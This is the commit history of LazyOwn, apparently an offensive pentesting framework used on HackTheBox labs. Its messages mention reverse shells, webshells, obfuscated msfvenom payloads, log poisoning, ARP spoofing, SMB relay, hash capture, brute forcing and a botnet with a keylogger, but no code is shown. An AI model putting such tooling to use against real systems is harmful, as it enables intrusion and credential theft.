    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new commands ip www to show ips and start webserver at sessions directory where lazyown dump scripts like revertshells, webshells, etc.



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 solarlab pwned :D new machine MagicGardens



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine solarlab :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new revshell.c and machine powned xD axlle hard



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new commands createrevshell y createwinrevshell



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 FormulaX pwned :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Freelancer Pwned :P new new new FormulaX :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Freelancer :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Skyfall Linux insane machine, Blazorized was powned :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Blazorized.htb



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Greenhorn.htb pwned



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new machine Greenhorn.htb



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new tool in external :) https://github.com/BloodHoundAD/SharpHound.git :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new MAchine Blazorized.htb :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new MAchine :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New command to copy the exploits from exploitdb use cp relative/path/show/in/searchexploit when you use the flag -x :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New command dsnmap :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New machine Runner.htb



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New command :) new resources in sessions, new module lazypsexec bruteforce :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New command :) samrdump



    • HackTheBox https://app.hackthebox.com/teams/overview/6429



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 news script bruteforce on modules :) :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command dnsenum :)



    • join to our team https://app.hackthebox.com/teams/overview/6429 new command dig



    • join to our team https://app.hackthebox.com/teams/overview/6429 new command dig



    • Update README.md



    • join to our team https://app.hackthebox.com/teams/overview/6429 new commands :)



    • Update lazyproxy.py



    • join to our team https://app.hackthebox.com/teams/overview/6429 new commands :) to se use tab tab or ?



    • join to our team https://app.hackthebox.com/teams/overview/6429 and new payloads in sessions directory :) :) :)



    • join to our team https://app.hackthebox.com/teams/overview/6429 and new exploits :)



    • join to our team https://app.hackthebox.com/teams/overview/6429 and new command run lazywerkzeugdebug



    • join to our team https://app.hackthebox.com/teams/overview/6429



    • join to our team https://app.hackthebox.com/teams/overview/6429



    • news exploits



    • new hashcat :D



    • new command dirsearch :D



    • new proxy better :D



    • new commands createhash, createwebshell, sqlmap, proxy, john2hash



    • little discover .sh



    • Create internal_discover.sh



    • 1 new exploit



    • Update README.md



    • 2 new exploit external :D working like a charm



    • new exploit werkzeug in debug mode lettle retocated to run in python3 from searchsploit :D



    • new command: exploits externals :D



    • new command: smbmap whattomap ex: smbmap tmp :D



    • go buster new parameter url to use url from payload not rhost



    • parameter added to gospider url to use var url in payload not rhost and add the command addhost host.ext to add the domain with rhost parameter to /etc/hosts not now to windows sistems sorry



    • refactor global var rhost deleted other ones



    • path hijacking add line to temp bash script



    • new command: gospider :D



    • new command: gobuster :D



    • new command: wfuzz :D and you can add example a hide line option like # wfuzz –hl=9 to hide responses with long line to 9



    • new command: run lazyssh77enum to enum using a wordlist and exploit foound searchsploit as openssh 7.7



    • new command: whatweb :D



    • new command: psexec :D



    • smbclient command and exploit to enum ssh i used in a machine of hackthebox to enum, i upload because i was lazy and dont deleted before xD



    • Merge pull request #22 from grisuno/grisuno-patch-1



    • Update README.md



    • mariadb rce :)



    • new command getseclist :D



    • payload.json to play on hackthebox :D



    • port a python del exploit archiconocido de meta exploit vsftpd 3.0.3



    • shell payload in python generated by msfvenom automated by lazyown framework ;)



    • new commit to check if alsr is activated in the kernel



    • deleted shells generated by the script



    • upx to shells generated by msfvenom automated by lazyown framework ;)



    • new comand arpscan



    • new path to diccionary to run by default in parrot



    • new gitignore



    • cambios en el miniburp



    • Update index.html



    • Update install.sh



    • herramienta para ofuscar payloads y es usada en lazylogpoisoner ;) pronto extendida al resto de payloads ;)



    • herramienta para ofuscar payloads y es usada en lazylogpoisoner ;) pronto extendida al resto de payloads ;)



    • herramienta para ofuscar payloads y es usada en lazylogpoisoner ;) pronto extendida al resto de payloads ;)



    • herramienta para ofuscar payloads y es usada en lazylogpoisoner ;) pronto extendida al resto de payloads ;)



    • herramienta para ofuscar payloads y es usada en lazylogpoisoner ;) pronto extendida al resto de payloads ;)



    • lazymitmap.py



    • lazymitmap.py



    • lazymitmap.py



    • Update lazycurl.sh



    • Update README.md



    • lazycurl.sh



    • Update install.sh



    • Update requirements.txt



    • Merge pull request #21 from grisuno/grisuno-patch-1



    • Update CNAME



    • Update install.sh



    • Create CNAME



    • metatags to seo



    • Lazy ntlmv2 firstaproach using in hashes.txt the ouput smbserver command when the conection is established



    • Lazy .gitignore



    • Lazy get smbserver with impacket :) and then you can sudo impacket-smbserver smbfolder /home/gris/tools/LazyOwn -smb2support with simple smbserver in LazyOwn console



    • LAzy get capabilities :P



    • LazyOwn FTP sniff prety messages :)



    • LazyOwn keygen to generate keys to use in payload.json to cypher the conections



    • LazyOwn smbrelay



    • LazyOwn http sniff :( not working fine yet



    • Update README.md



    • LazyOwn ftp sniff :)



    • LazyOwn README



    • LazyOwn ArpSpoofing README and banner :P [;,;]



    • LazyOwn ArpSpoofing [;,;]



    • Update README.md



    • Lazy path hijacking :)



    • Lazy msfvenom reverse :)



    • Lazy Log more lfi list :)



    • Lazy Log Poisonig more poison bro



    • Lazy Log Poisonig in ssh first aproach



    • Lazy Log Poisonig



    • Lazy Log Poisonig



    • Lazy Log Poisonig



    • Delete lazylogpisoning.py



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • Update app.py



    • Lazy Log Poisonig



    • fix install



    • Update lazypwnkit.py



    • Create lazyssh.py



    • #!/usr/bin/env python3 #_*_ coding: utf8 _*_



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • add #!/usr/bin/env python3 #_*_ coding: utf8 _*_



    • Update README.md



    • Update lazylfi2rce.py



    • dic



    • Update app.py



    • dos2unix



    • Update README.md



    • better implementation



    • tentativas de herramientas nuevas



    • google analytics



    • dos2unix



    • Update index.html



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • Update .gitignore



    • delete python librarys



    • use of python3 env



    • use of python3 env



    • Update index.html



    • Update index.html



    • Update index.html



    • Update index.html



    • Update index.html



    • Update README.md



    • Update index.html



    • Update index.html



    • banner



    • nueva shell zsh :)



    • index nuevo



    • Create index.html



    • Update app.py



    • Update app.py



    • imlementacion de libreria pwn



    • new tags



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • Create lazygalazy.py



    • Update app.py



    • Create lazyclonewars.sh



    • Update README.md



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • Update lazywebshell.sh



    • Update README.md



    • Update app.py



    • Create lazywebshell.sh



    • mejora en la webshell de python



    • webshells



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • comentarios necesarios



    • Update README.md



    • return jsonify({“error”: “error”}), 500



    • Fix code scanning alert - Information exposure through an exception #16



    • Fix code scanning alert - Flask app is run in debug mode #17



    • py2elf experimental



    • nueva interfaz web experimental



    • Update app.py



    • nuevo bot de investigacion



    • remove keys xD



    • new honeypot



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • New BotNet with Keylogger



    • Merge pull request #13 from grisuno/grisuno-patch-7



    • Update README.md



    • Create pull_request_template.md



    • Update README.md



    • Create pull_request_template.md



    • device to sniff parametric



    • netbios atack



    • Update lazynetbios.py



    • update req*



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • new netbios atack mode



    • Update README.md



    • del



    • mejoras en ncurses



    • Update lazysniff.py



    • nuevo modulo de sniffer



    • Update lazyownclient.py



    • Merge branch ‘main’ of https://github.com/grisuno/LazyOwn



    • new command fixperm



    • Update README.md



    • nuevo modulo de gathering



    • Update search.py



    • new comand payload :)



    • nueva estructura de directorios



    • Update app.py



    • Update README.md



    • Update lazyownserver.py



    • Merge pull request #10 from grisuno/grisuno-patch-6



    • Update lazyownclient.py



    • Update README.md



    • Update requirements.txt



    • Update app.py



    • Create lazyownclient.py



    • Create lazyownserver.py



    • Update app.py



    • Update README.md



    • Update app.py



    • Update lazynmap.sh



    • Update requirements.txt



    • Update app.py



    • Merge pull request #8 from grisuno/grisuno-patch-6



    • Update requirements.txt



    • Update README.md



    • Update app.py



    • Create lazyown_metaextract0r.py



    • Update README.md



    • Update lazygptcli.py



    • Update README.md



    • Update lazygptcli.py



    • Update lazygptcli.py



    • Update README.md



    • Update app.py



    • Update README.md



    • Update README.md



    • Update README.md



    • Create app.py



    • Update README.md



    • Update README.md



    • Create lazyown_bprfuzzer.py



    • Update lazygptcli.py



    • Merge pull request #6 from grisuno/grisuno-patch-5



    • Update update_db.sh



    • Update update_db.sh



    • Update requirements.txt



    • Update README.md



    • Update README.md



    • Update lazygptcli.py



    • Create lazygptcli.py



    • Update README.md



    • Update README.md



    • Update README.md



    • Create lazynmap.sh



    • Update lazyreverse_shell.sh



    • Merge pull request #5 from grisuno/grisuno-patch-4



    • Update README.md



    • Update README.md



    • Create lazyreverse_shell.sh



    • Update README.md



    • Update requirements.txt



    • Update README.md



    • Update LazyOwnExplorer.py



    • Update README.md



    • Create LazyOwnExplorer.py



    • Update README.md



    • Merge pull request #4 from grisuno/grisuno-patch-3



    • Create requirements.txt



    • Create CODE_OF_CONDUCT.md



    • Update issue templates



    • Create SECURITY.md



    • Create CONTRIBUTING.md



    • Merge pull request #3 from grisuno/grisuno-patch-2



    • Create LICENSE



    • Merge pull request #1 from grisuno/grisuno-patch-1



    • Update lazyown.py



    • Update README.md



    • Update README.md



    • Create lazyatack.sh



    • Update README.md



    • Update README.md



    • Create lazysearch.py



    • Update README.md



    • Update README.md



    • Update update_db.sh



    • Update update_db.sh



    • Update README.md



    • ██╗ █████╗ ███████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗ ██║ ██╔══██╗╚══███╔╝╚██╗ ██╔╝██╔═══██╗██║ ██║████╗ ██║ ██║ ███████║ ███╔╝ ╚████╔╝ ██║ ██║██║ █╗ ██║██╔██╗ ██║ ██║ ██╔══██║ ███╔╝ ╚██╔╝ ██║ ██║██║███╗██║██║╚██╗██║ ███████╗██║ ██║███████╗ ██║ ╚██████╔╝╚███╔███╔╝██║ ╚████║ ╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═══╝



    • Create update_db.sh



    • Update README.md



    • Add files via upload



    • Create lazyown.py



    • Create bin_data_relevant.csv



    • Create bin_data.csv



    • Create detailed_search.py



    • Create search.py



    • Update README.md
  • docs(update readme description): change of the description; Update README.md * docs(update readme description): change of the description; Update README.md
* docs(update readme description): change of the description; Update README.md * docs(update readme description): change of the description; Update README.md